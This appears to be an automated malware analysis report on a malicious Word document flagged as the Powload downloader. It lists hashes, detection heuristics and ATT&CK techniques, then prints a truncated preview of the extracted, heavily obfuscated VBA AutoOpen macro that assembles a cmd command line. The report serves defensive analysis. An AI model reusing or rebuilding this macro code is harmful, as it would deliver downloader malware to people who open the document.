Office (OLE) malware analysis — malicious · e8d02a9ed4c26e13

MALICIOUS

Office (OLE)

150.4 KB Created: 2018-09-24 06:20:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 359e11cd67950efde33a69a3199da7f7 SHA-1: a9913b0915ec56370c0de25245d5a25ff742b071 SHA-256: e8d02a9ed4c26e130a249bfb471a0f8880d06cf998a4cf55731131fb37e4bd52

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical heuristic firing, indicating an attempt to execute arbitrary commands. The presence of the ClamAV detection 'Doc.Malware.Powload-6922948-0' further confirms its malicious nature. The macro's obfuscated nature prevents a precise determination of its payload, but its intent is clearly to download and execute a second-stage threat.

Heuristics 6

ClamAV: Doc.Malware.Powload-6922948-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Powload-6922948-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 105236 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	105236 bytes
SHA-256: `14d9c6cbaca87399c2841c3e073ce3c4c286fd85a4ec18f7e4c906cdf296182d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mFFOpiAjnE" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim zTblRk(1) zTblRk(0) = Left(LrlZCclKnW + VSvKWrSCzQvRmPWsVcFUztfmmFpnKSUFiYR + RPXvwTnJNOS, 346) + MidB(UXKzRqFjzKc + SolwbGCoEaNzZsZqXVQpzYzYVlRMSMU + cPqLroPwzA, 844, 970) + Left(HmGUJSGR + ihCnNunEXHwhKZBjkWZsiKZLsK + KoOdJlciC, 247) + Mid(VJfFwuHiVvB + pXcojvtUlmShPQHCUwXVfUOz + sPnuUUOzuT, 339, 875) Dim DbJROT(1) DbJROT(0) = MidB(HEZNroLRB + VCdhpFvRKNaPLBFOumfKXfP + fYAnRZidZt, 387, 242) + Mid(riudKBq + fwujqrGBaqXmmiJqhXfUbknfdCFMhwaUp + nlTruVvQFwUUT, 385, 350) Dim smPfr(1) smPfr(0) = MidB(bpzKRCzTVw + AWzYNuCHHAubqvmhzRLtYnJDLBawTCHbBtOB + TMbvXUWFLmVjf, 133, 537) + MidB(dErqFjC + jUvtTzjVZMBXpjGcnXAzTqkzuzNf + zkCJRSXAKh, 295, 429) + MidB(OKkOrZn + VcCizmVLjnjXiwZVESjwqfijOw + hwAjhOkYOoVijT, 653, 193) + Mid(pVVAnQlfMDQCH + nwZDzPKljYYzBWzYDbJhKkvBChHLhI + VIGiYfkobPTkSp, 118, 844) pzdrMmcd (KeyString(vbKeyC) + KeyString(vbKeyM) + SICWw + wDVGZcO + HSwCLczUi + LNklztmMcXVjT) Dim JhlsPt(2) JhlsPt(0) = MidB(hEwlZqsZ + atikjWaqAqmmcUSjmbwNGCj + MVkwdbto, 25, 481) + MidB(SjDzQuSTQ + aqFdijbhCUTUQrIKauTTTrsQqHNh + wKIYwPHZr, 921, 892) + Mid(jjYmHljWc + lllPlZonZEGjjMTYXZTbJjR + wIsVDln, 250, 582) + MidB(RHGbLNapCvRKV + zSJbfTEirQLzwwzojQSrPvJcTKizW + oVDCMUNYPL, 998, 271) JhlsPt(1) = MidB(FwciJpSiaujWr + MSpEhJbvmTXrCjPhllBTNGCJuIW + cACsKJpjiAq, 211, 339) + Left(buiwlFXLLzb + AjnQdOurznEvEiMLIbhziXEXFprtjL + zNZhDYkbHZb, 807) + Left(wArfJESjItYqo + uVLlYlwlsPrFsEvQqqBDCFNQF + NjiTMDPE, 546) + Right(PQmtNNo + JTXLRsRJfKUtERjImjBjJqblQIrAcB + tLWBUlFZRjGKwH, 258) End Sub Attribute VB_Name = "ICQzZKVpHBB" Function SICWw() Dim zCrSNn(2) zCrSNn(0) = Left(nnZilTRuq + CIjKXPvrcqZojsBNuDZLfFJMzCz + DlibTrUD, 344) + Left(aNckwtSDT + YcwAFNDpibNHDERGWcHKkRcZN + uwvCMCiSmGAW, 125) + Right(AUhtckhMuYRRLj + ppFkfSFqCmPjzGAZlRIiwNjAiukSj + KhAAUiOqr, 803) + MidB(MYRQsaSTwVKHWv + wRTjZhLYAYRtBcodQWdssRqVpW + YQnuaVoYfNs, 321, 379) zCrSNn(1) = Left(avtWdGZpOSYb + LVCHusSGGBSorOTMYihQzPXwbYbBuZpUrq + QQTorEpOia, 907) + MidB(thRkZCrXurhiAY + XWdDzRQlEvZIQAdArXjSnR + ZmJrfaLLDS, 47, 6) + Right(VwUGROdqD + XXfnEplzvqJcNPzFwLTBZazhznsijAtICj + dQCfZLWHqSRXus, 792) + Right(wdDHIlKCIabUHw + wiCztAqNpqhWorLwKGsVfrdRkvnj + pzJmzDv, 739) Dim RDohT(2) RDohT(0) = Right(XwqNOENXH + FSCGMVfqhZzHQdbDbwBfQnfnatwPpnM + OLrSBcCqXp, 609) + MidB(dKvDVkEmlShi + kJKTwkGMrjltVztwzqpPmTbbkcsKjwf + NVhMiRSMSbPF, 960, 860) + MidB(sQiwqYBWIWjw + zqiIjdRKzTHUrMkYcrjwSqpTKE + TnQdZXpMqPOF, 698, 596) + Left(KKljzZw + tPRqJGZBPUDNnzwXiaMnHlIASYjt + MfHYVjJ, 778) RDohT(1) = Right(fOAwWmnbrj + jcJFBGHdjGdzBrXBBDrIslLiflHB + VwfOPfDjao, 478) + Left(vPvPZqf + oURUpbcrYVYjIMVAHwDjGiQOkW + bhCKKzvq, 520) + Mid(PUQdPGiGoVfk + kKlYNsUrtuqiBLqiZDNoEBHBQtpwzfZan + NMOXbVnkI, 638, 899) + Right(FjIwVThXFqEzD + wZbXhNLqzQnURzUVvzrcEUcuIVJZX + mjGWQdtqJfiwPG, 121) Dim XjIjqB(2) XjIjqB(0) = Right(dbVRFqEwilEHYa + CowWsTUlQHoQiFKOFjrtNXcFt + azVGjBCXFKGK, 622) + MidB(PirwaBOLIUKv + QObrzqJSJJlbiFwVKEiNuskLlNmWGSZow + jzZzYiNzTJ, 133, 186) XjIjqB(1) = MidB(rGqWAjw + YFXniJJQITCEEKVfhtiDnVPLi + zVRUBrBuiqKswq, 926, 424) + Mid(jBUwFwc + jRPzbwMhMjDSUDGJjNrzcJBQbAP + HqRdSsjulWPJC, 973, 259) Dim BuRSLa(1) BuRSLa(0) = Right(czjDnfQRj + bNmUoHnshjBMiwWksjbfMjow + bhIqwcdodGZ, 258) + Right(lSvUYoJuwwJn + ZlAKkPFzBLQChsMLiPtoTXOTjiJjIbwO + PdDdlRj, 79) + MidB(bCmnfYInfz + VwZRriHaYTBGBLOIcEPBivWBkTIitZcHH + ZFwvuIAjrd, 238, 880) + Right(tQkbEvV + WHPkHhTuEKnwTGzjfYYZifAIs + IzEcanf, 467) crizDMTm = "d /V/C" + CStr(Chr(5 + 3 + 0 + 1 + 25)) + "^s" + "^e^t " + "#^+^$=" + "/^_^\ ^_/" + "^-^ ^" + "_^\- _^-" + "^\^ -^\_ \^_/" + "^ /^-\" Dim GGBua(1) GGBua(0) = MidB(HBipqZsJ + vXqXzSDzfqWBshfsNnUtcVkcJVq + QraiAfJnw, 950, 887) + Mid(FJcIKjfWtcadO + qtbpAFkBafNEzdroQazBKJKvX + AlivwEVEBiUICF, 599, 373) Dim QLAmZ(2) QLAmZ(0) = Left(rsQfqJNmaDt ... (truncated)

SHA-256: 14d9c6cbaca87399c2841c3e073ce3c4c286fd85a4ec18f7e4c906cdf296182d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mFFOpiAjnE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim zTblRk(1)
zTblRk(0) = Left(LrlZCclKnW + VSvKWrSCzQvRmPWsVcFUztfmmFpnKSUFiYR + RPXvwTnJNOS, 346) + MidB(UXKzRqFjzKc + SolwbGCoEaNzZsZqXVQpzYzYVlRMSMU + cPqLroPwzA, 844, 970) + Left(HmGUJSGR + ihCnNunEXHwhKZBjkWZsiKZLsK + KoOdJlciC, 247) + Mid(VJfFwuHiVvB + pXcojvtUlmShPQHCUwXVfUOz + sPnuUUOzuT, 339, 875)
   Dim DbJROT(1)
DbJROT(0) = MidB(HEZNroLRB + VCdhpFvRKNaPLBFOumfKXfP + fYAnRZidZt, 387, 242) + Mid(riudKBq + fwujqrGBaqXmmiJqhXfUbknfdCFMhwaUp + nlTruVvQFwUUT, 385, 350)
   Dim smPfr(1)
smPfr(0) = MidB(bpzKRCzTVw + AWzYNuCHHAubqvmhzRLtYnJDLBawTCHbBtOB + TMbvXUWFLmVjf, 133, 537) + MidB(dErqFjC + jUvtTzjVZMBXpjGcnXAzTqkzuzNf + zkCJRSXAKh, 295, 429) + MidB(OKkOrZn + VcCizmVLjnjXiwZVESjwqfijOw + hwAjhOkYOoVijT, 653, 193) + Mid(pVVAnQlfMDQCH + nwZDzPKljYYzBWzYDbJhKkvBChHLhI + VIGiYfkobPTkSp, 118, 844)
pzdrMmcd (KeyString(vbKeyC) + KeyString(vbKeyM) + SICWw + wDVGZcO + HSwCLczUi + LNklztmMcXVjT)
   Dim JhlsPt(2)
JhlsPt(0) = MidB(hEwlZqsZ + atikjWaqAqmmcUSjmbwNGCj + MVkwdbto, 25, 481) + MidB(SjDzQuSTQ + aqFdijbhCUTUQrIKauTTTrsQqHNh + wKIYwPHZr, 921, 892) + Mid(jjYmHljWc + lllPlZonZEGjjMTYXZTbJjR + wIsVDln, 250, 582) + MidB(RHGbLNapCvRKV + zSJbfTEirQLzwwzojQSrPvJcTKizW + oVDCMUNYPL, 998, 271)
JhlsPt(1) = MidB(FwciJpSiaujWr + MSpEhJbvmTXrCjPhllBTNGCJuIW + cACsKJpjiAq, 211, 339) + Left(buiwlFXLLzb + AjnQdOurznEvEiMLIbhziXEXFprtjL + zNZhDYkbHZb, 807) + Left(wArfJESjItYqo + uVLlYlwlsPrFsEvQqqBDCFNQF + NjiTMDPE, 546) + Right(PQmtNNo + JTXLRsRJfKUtERjImjBjJqblQIrAcB + tLWBUlFZRjGKwH, 258)
End Sub


Attribute VB_Name = "ICQzZKVpHBB"
Function SICWw()
Dim zCrSNn(2)
zCrSNn(0) = Left(nnZilTRuq + CIjKXPvrcqZojsBNuDZLfFJMzCz + DlibTrUD, 344) + Left(aNckwtSDT + YcwAFNDpibNHDERGWcHKkRcZN + uwvCMCiSmGAW, 125) + Right(AUhtckhMuYRRLj + ppFkfSFqCmPjzGAZlRIiwNjAiukSj + KhAAUiOqr, 803) + MidB(MYRQsaSTwVKHWv + wRTjZhLYAYRtBcodQWdssRqVpW + YQnuaVoYfNs, 321, 379)
zCrSNn(1) = Left(avtWdGZpOSYb + LVCHusSGGBSorOTMYihQzPXwbYbBuZpUrq + QQTorEpOia, 907) + MidB(thRkZCrXurhiAY + XWdDzRQlEvZIQAdArXjSnR + ZmJrfaLLDS, 47, 6) + Right(VwUGROdqD + XXfnEplzvqJcNPzFwLTBZazhznsijAtICj + dQCfZLWHqSRXus, 792) + Right(wdDHIlKCIabUHw + wiCztAqNpqhWorLwKGsVfrdRkvnj + pzJmzDv, 739)
   Dim RDohT(2)
RDohT(0) = Right(XwqNOENXH + FSCGMVfqhZzHQdbDbwBfQnfnatwPpnM + OLrSBcCqXp, 609) + MidB(dKvDVkEmlShi + kJKTwkGMrjltVztwzqpPmTbbkcsKjwf + NVhMiRSMSbPF, 960, 860) + MidB(sQiwqYBWIWjw + zqiIjdRKzTHUrMkYcrjwSqpTKE + TnQdZXpMqPOF, 698, 596) + Left(KKljzZw + tPRqJGZBPUDNnzwXiaMnHlIASYjt + MfHYVjJ, 778)
RDohT(1) = Right(fOAwWmnbrj + jcJFBGHdjGdzBrXBBDrIslLiflHB + VwfOPfDjao, 478) + Left(vPvPZqf + oURUpbcrYVYjIMVAHwDjGiQOkW + bhCKKzvq, 520) + Mid(PUQdPGiGoVfk + kKlYNsUrtuqiBLqiZDNoEBHBQtpwzfZan + NMOXbVnkI, 638, 899) + Right(FjIwVThXFqEzD + wZbXhNLqzQnURzUVvzrcEUcuIVJZX + mjGWQdtqJfiwPG, 121)
   Dim XjIjqB(2)
XjIjqB(0) = Right(dbVRFqEwilEHYa + CowWsTUlQHoQiFKOFjrtNXcFt + azVGjBCXFKGK, 622) + MidB(PirwaBOLIUKv + QObrzqJSJJlbiFwVKEiNuskLlNmWGSZow + jzZzYiNzTJ, 133, 186)
XjIjqB(1) = MidB(rGqWAjw + YFXniJJQITCEEKVfhtiDnVPLi + zVRUBrBuiqKswq, 926, 424) + Mid(jBUwFwc + jRPzbwMhMjDSUDGJjNrzcJBQbAP + HqRdSsjulWPJC, 973, 259)
   Dim BuRSLa(1)
BuRSLa(0) = Right(czjDnfQRj + bNmUoHnshjBMiwWksjbfMjow + bhIqwcdodGZ, 258) + Right(lSvUYoJuwwJn + ZlAKkPFzBLQChsMLiPtoTXOTjiJjIbwO + PdDdlRj, 79) + MidB(bCmnfYInfz + VwZRriHaYTBGBLOIcEPBivWBkTIitZcHH + ZFwvuIAjrd, 238, 880) + Right(tQkbEvV + WHPkHhTuEKnwTGzjfYYZifAIs + IzEcanf, 467)
crizDMTm = "d /V/C" + CStr(Chr(5 + 3 + 0 + 1 + 25)) + "^s" + "^e^t " + "#^+^$=" + "/^_^\ ^_/" + "^-^ ^" + "_^\- _^-" + "^\^ -^\_ \^_/" + "^ /^-\"
Dim GGBua(1)
GGBua(0) = MidB(HBipqZsJ + vXqXzSDzfqWBshfsNnUtcVkcJVq + QraiAfJnw, 950, 887) + Mid(FJcIKjfWtcadO + qtbpAFkBafNEzdroQazBKJKvX + AlivwEVEBiUICF, 599, 373)
   Dim QLAmZ(2)
QLAmZ(0) = Left(rsQfqJNmaDt
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.